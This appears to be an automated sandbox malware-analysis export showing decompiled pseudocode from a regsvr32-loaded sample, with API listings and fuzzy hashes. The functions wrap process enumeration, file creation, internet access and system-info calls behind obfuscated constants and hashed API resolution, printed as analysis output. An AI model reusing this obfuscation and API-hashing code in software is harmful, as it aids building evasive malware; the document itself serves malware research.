                                                                                                            			E04D49D01(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				void* _t32;
                                                                                                            				int _t40;
                                                                                                            				signed int _t42;
                                                                                                            
                                                                                                            				_push(_a16);
                                                                                                            				_push(_a12);
                                                                                                            				_push(_a8);
                                                                                                            				_push(_a4);
                                                                                                            				E04D432C4(_t32);
                                                                                                            				_v16 = 0x4f77f;
                                                                                                            				_v16 = 0x81a250;
                                                                                                            				_t42 = 0x52;
                                                                                                            				_v16 = _v16 / _t42;
                                                                                                            				_v16 = _v16 ^ 0x000f3fad;
                                                                                                            				_v8 = 0x15d180;
                                                                                                            				_v8 = _v8 ^ 0x3a00eb16;
                                                                                                            				_v8 = _v8 | 0xa1b05abd;
                                                                                                            				_v8 = _v8 ^ 0xbbb018ec;
                                                                                                            				_v12 = 0x634245;
                                                                                                            				_v12 = _v12 + 0x55ea;
                                                                                                            				_v12 = _v12 ^ 0x006de6e2;
                                                                                                            				E04D352F2(_t42, _v16 % _t42, _t42, 0x1b0, 0x132bfc3c, 0x9f49d153);
                                                                                                            				_push(_a16);
                                                                                                            				_t40 = Process32FirstW(_a8); // executed
                                                                                                            				return _t40;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • Process32FirstW.KERNEL32(000F3FAD,?), ref: 04D49D97
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FirstProcess32
                                                                                                            • String ID: m
                                                                                                            • API String ID: 2623510744-1228489174
                                                                                                            • Opcode ID: 3f2d7b86be3fd7bd22f04a055944d160ac4cf9a307f336463c22ccccc1c1cdc1
                                                                                                            • Instruction ID: 602b8e96f47967f0be67f48a4a23c89e09cba565f97ca0cf85a08bd2949bf80b
                                                                                                            • Opcode Fuzzy Hash: 3f2d7b86be3fd7bd22f04a055944d160ac4cf9a307f336463c22ccccc1c1cdc1
                                                                                                            • Instruction Fuzzy Hash: EE01F376E00208BBDF44EFE4DD4689EBFB1EB44314F10C098B924A6251D77A9B649F50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 55%
                                                                                                            			E04D4602C(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, long _a20, WCHAR* _a24, intOrPtr _a28, intOrPtr _a36) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                            				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				void* _t42;
                                                                                                            				void* _t50;
                                                                                                            				signed int _t53;
                                                                                                            				long _t57;
                                                                                                            				long _t58;
                                                                                                            
                                                                                                            				_t58 = __edx;
                                                                                                            				_push(0);
                                                                                                            				_push(_a36);
                                                                                                            				_t57 = __ecx;
                                                                                                            				_push(0);
                                                                                                            				_push(_a28);
                                                                                                            				_push(_a24);
                                                                                                            				_push(_a20);
                                                                                                            				_push(_a16);
                                                                                                            				_push(_a12);
                                                                                                            				_push(_a8);
                                                                                                            				_push(_a4);
                                                                                                            				_push(__edx);
                                                                                                            				_push(__ecx);
                                                                                                            				E04D432C4(_t42);
                                                                                                            				_v32 = 0xf2bcc;
                                                                                                            				_v28 = 0x9963f;
                                                                                                            				_v24 = 0;
                                                                                                            				_v20 = 0;
                                                                                                            				_v12 = 0x481e97;
                                                                                                            				_v12 = _v12 + 0x3bb9;
                                                                                                            				_v12 = _v12 | 0xe5ca697e;
                                                                                                            				_v12 = _v12 ^ 0xe5cf84b6;
                                                                                                            				_v8 = 0xca7b5c;
                                                                                                            				_t53 = 0x38;
                                                                                                            				_v8 = _v8 / _t53;
                                                                                                            				_v8 = _v8 >> 6;
                                                                                                            				_v8 = _v8 ^ 0x0004807b;
                                                                                                            				_v16 = 0xf3cd85;
                                                                                                            				_v16 = _v16 ^ 0x0b7576d7;
                                                                                                            				_v16 = _v16 ^ 0x0b87a2f8;
                                                                                                            				E04D352F2(_t53, _v8 % _t53, _t53, 0xf4, 0xbdcc8d36, 0x9f49d153);
                                                                                                            				_t50 = CreateFileW(_a24, _a20, _a12, 0, _t57, _t58, 0); // executed
                                                                                                            				return _t50;
                                                                                                            			}
















                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(000F2BCC,0009963F,065F7FFE,00000000,?,000F5428,00000000), ref: 04D460F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 473fedd74ae4a623ca298743d6ffebda1a16a04a3240cc23b0471d744042e6d8
                                                                                                            • Instruction ID: 00a91a3da8d28ae556a9f72a47f15d4084ba4f84ac96c4fc2acac3d4ad558262
                                                                                                            • Opcode Fuzzy Hash: 473fedd74ae4a623ca298743d6ffebda1a16a04a3240cc23b0471d744042e6d8
                                                                                                            • Instruction Fuzzy Hash: A121257290020DBFDF05DF95DC858AFBFB9EB44358F108098FA1462220D7764A64AB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 61%
                                                                                                            			E04D4A036(intOrPtr _a4, long _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				WCHAR* _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				void* _t40;
                                                                                                            				void* _t51;
                                                                                                            				signed int _t52;
                                                                                                            				signed int _t53;
                                                                                                            
                                                                                                            				_push(_a28);
                                                                                                            				_push(_a24);
                                                                                                            				_push(_a20);
                                                                                                            				_push(0);
                                                                                                            				_push(0);
                                                                                                            				_push(_a8);
                                                                                                            				_push(_a4);
                                                                                                            				_push(0);
                                                                                                            				_push(0);
                                                                                                            				E04D432C4(_t40);
                                                                                                            				_v28 = 0xc6a10;
                                                                                                            				_v24 = 0xfaef;
                                                                                                            				_v20 = 0;
                                                                                                            				_v16 = 0xa1bc2a;
                                                                                                            				_v16 = _v16 + 0xffffaa1d;
                                                                                                            				_v16 = _v16 ^ 0x00a4ad57;
                                                                                                            				_v8 = 0x3e4b3;
                                                                                                            				_t52 = 0x68;
                                                                                                            				_v8 = _v8 / _t52;
                                                                                                            				_t53 = 0x6a;
                                                                                                            				_v8 = _v8 / _t53;
                                                                                                            				_v8 = _v8 | 0x26efe292;
                                                                                                            				_v8 = _v8 ^ 0x26eab699;
                                                                                                            				_v12 = 0x3502d9;
                                                                                                            				_v12 = _v12 * 0x26;
                                                                                                            				_v12 = _v12 ^ 0x07d1b182;
                                                                                                            				E04D352F2(_t53, _v8 % _t53, _t53, 0x180, 0xba6dd0e5, 0xfd56727);
                                                                                                            				_t51 = InternetOpenW(0, _a8, 0, 0, 0); // executed
                                                                                                            				return _t51;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • InternetOpenW.WININET(00000000,00A4AD57,00000000,00000000,00000000), ref: 04D4A0EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InternetOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2038078732-0
                                                                                                            • Opcode ID: a719cf364fb45ffd86ad1d374b202fba24b484548c5c7e75d3cff7536fc428c4
                                                                                                            • Instruction ID: 3298bbf6cebdaf9c9f3229e0dafd487168d8fae012ff67739372f3a8757390ef
                                                                                                            • Opcode Fuzzy Hash: a719cf364fb45ffd86ad1d374b202fba24b484548c5c7e75d3cff7536fc428c4
                                                                                                            • Instruction Fuzzy Hash: 231144B1D01218FBCB14DFA5DC4A8CEBFB5EF09314F108189B41866250E3B15B20DFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 72%
                                                                                                            			E04D489C9(void* __ecx, void* __edx, void* _a4, intOrPtr _a12) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				unsigned int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				void* _t28;
                                                                                                            				char _t34;
                                                                                                            				void* _t37;
                                                                                                            
                                                                                                            				_push(_a12);
                                                                                                            				_t37 = __edx;
                                                                                                            				_push(0);
                                                                                                            				_push(_a4);
                                                                                                            				_push(__edx);
                                                                                                            				_push(__ecx);
                                                                                                            				E04D432C4(_t28);
                                                                                                            				_v20 = 0xfe879;
                                                                                                            				_v16 = 0x1b168;
                                                                                                            				_v12 = 0x80e690;
                                                                                                            				_v12 = _v12 | 0x46582297;
                                                                                                            				_v12 = _v12 + 0xffffc97a;
                                                                                                            				_v12 = _v12 ^ 0x46d7fd18;
                                                                                                            				_v16 = 0x13187e;
                                                                                                            				_v16 = _v16 >> 4;
                                                                                                            				_v16 = _v16 ^ 0x0006b0af;
                                                                                                            				_v8 = 0xe112ab;
                                                                                                            				_v8 = _v8 ^ 0x04f2baba;
                                                                                                            				_v8 = _v8 + 0xfffff742;
                                                                                                            				_v8 = _v8 ^ 0x041ecc34;
                                                                                                            				E04D352F2(__ecx, __edx, __ecx, 0xa7, 0x5bb15cf1, 0x9f49d153);
                                                                                                            				_t34 = RtlFreeHeap(_a4, 0, _t37); // executed
                                                                                                            				return _t34;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • RtlFreeHeap.NTDLL(46D7FD18,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 04D48A63
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3298025750-0
                                                                                                            • Opcode ID: 907c7cb9df6a94939db9fdef9cbffa6edbe829b78ef88f4eb5270b57f0aedf4f
                                                                                                            • Instruction ID: 1a4ae2308a4c1fecae59c83eb11f67531117d4507f9d55e7f0eb78e3d83024b9
                                                                                                            • Opcode Fuzzy Hash: 907c7cb9df6a94939db9fdef9cbffa6edbe829b78ef88f4eb5270b57f0aedf4f
                                                                                                            • Instruction Fuzzy Hash: 56013971D01308BBDB14DFA5DD46A9EBFB4EF01314F108588A82476250D7B59B54DF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 58%
                                                                                                            			E04D46CBC(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				void* _t29;
                                                                                                            				intOrPtr* _t36;
                                                                                                            				void* _t37;
                                                                                                            				void* _t40;
                                                                                                            
                                                                                                            				_t40 = __ecx;
                                                                                                            				E04D432C4(_t29);
                                                                                                            				_v16 = 0x15a4f;
                                                                                                            				_v16 = 0x3d6bbe;
                                                                                                            				_v16 = _v16 << 0x10;
                                                                                                            				_v16 = _v16 + 0x3f64;
                                                                                                            				_v16 = _v16 ^ 0x6bbda58e;
                                                                                                            				_v12 = 0xa5f035;
                                                                                                            				_v12 = _v12 | 0xf21ffb55;
                                                                                                            				_v12 = _v12 << 0xb;
                                                                                                            				_v12 = _v12 ^ 0xffd4e6dd;
                                                                                                            				_v8 = 0xd63fc1;
                                                                                                            				_v8 = _v8 | 0x77e9870d;
                                                                                                            				_v8 = _v8 * 0x30;
                                                                                                            				_v8 = _v8 * 0x28;
                                                                                                            				_v8 = _v8 ^ 0xfe1e2bfe;
                                                                                                            				_t36 = E04D352F2(__ecx, __edx, __ecx, 0x41, 0xd932dbc3, 0x9f49d153);
                                                                                                            				_t37 =  *_t36(_t40, __ecx, __edx, _a4); // executed
                                                                                                            				return _t37;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 04D46D4D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoNativeSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1721193555-0
                                                                                                            • Opcode ID: ad5fa428619d65438e5ec0d8e6b2fe6bd57a7ebf2171d538b6b34230017cd31c
                                                                                                            • Instruction ID: d0a967a4eb4ac5a94e5823161c0b41816fa03cf43125b579e4d2b1f709c3779f
                                                                                                            • Opcode Fuzzy Hash: ad5fa428619d65438e5ec0d8e6b2fe6bd57a7ebf2171d538b6b34230017cd31c
                                                                                                            • Instruction Fuzzy Hash: 57013572D01208FBDB04DF99E94A88DBFB8EF40304F10C198E821B7250D3B45B508F45
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E04D38B6C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				void* _t29;
                                                                                                            				int _t35;
                                                                                                            				void* _t38;
                                                                                                            
                                                                                                            				_push(_a8);
                                                                                                            				_t38 = __edx;
                                                                                                            				_push(_a4);
                                                                                                            				_push(__edx);
                                                                                                            				_push(__ecx);
                                                                                                            				E04D432C4(_t29);
                                                                                                            				_v20 = 0x5d7bf;
                                                                                                            				_v16 = 0x99716;
                                                                                                            				_v16 = 0xe29eb1;
                                                                                                            				_v16 = _v16 ^ 0x3393c2ed;
                                                                                                            				_v16 = _v16 ^ 0x337b9675;
                                                                                                            				_v8 = 0xbc32bf;
                                                                                                            				_v8 = _v8 + 0xffff25e6;
                                                                                                            				_v8 = _v8 >> 0x10;
                                                                                                            				_v8 = _v8 ^ 0xde5dd6d8;
                                                                                                            				_v8 = _v8 ^ 0xde59c7e5;
                                                                                                            				_v12 = 0xe3d251;
                                                                                                            				_v12 = _v12 >> 5;
                                                                                                            				_v12 = _v12 | 0x08a6b2c4;
                                                                                                            				_v12 = _v12 ^ 0x08adb9ba;
                                                                                                            				E04D352F2(__ecx, __edx, __ecx, 0x34, 0x2b7f8c29, 0x9f49d153);
                                                                                                            				_t35 = FindCloseChangeNotification(_t38); // executed
                                                                                                            				return _t35;
                                                                                                            			}











                                                                                                            APIs
                                                                                                            • FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?,?,?,000BFAA1), ref: 04D38C00
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                            • String ID:
                                                                                                            • API String ID: 2591292051-0
                                                                                                            • Opcode ID: 8bbb35c7ee8c589e2d73615254176720b78bb129de417fc4cb1d75a5b3d4ba90
                                                                                                            • Instruction ID: a2806dfd7b6b95d76290dec21f0f2238e51c94d7e952e87e367409f26a09c2e5
                                                                                                            • Opcode Fuzzy Hash: 8bbb35c7ee8c589e2d73615254176720b78bb129de417fc4cb1d75a5b3d4ba90
                                                                                                            • Instruction Fuzzy Hash: D2011775D0521CFBDB14EFA8894A88EBBB4EF00318F108489E825B7250D7755B14DF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%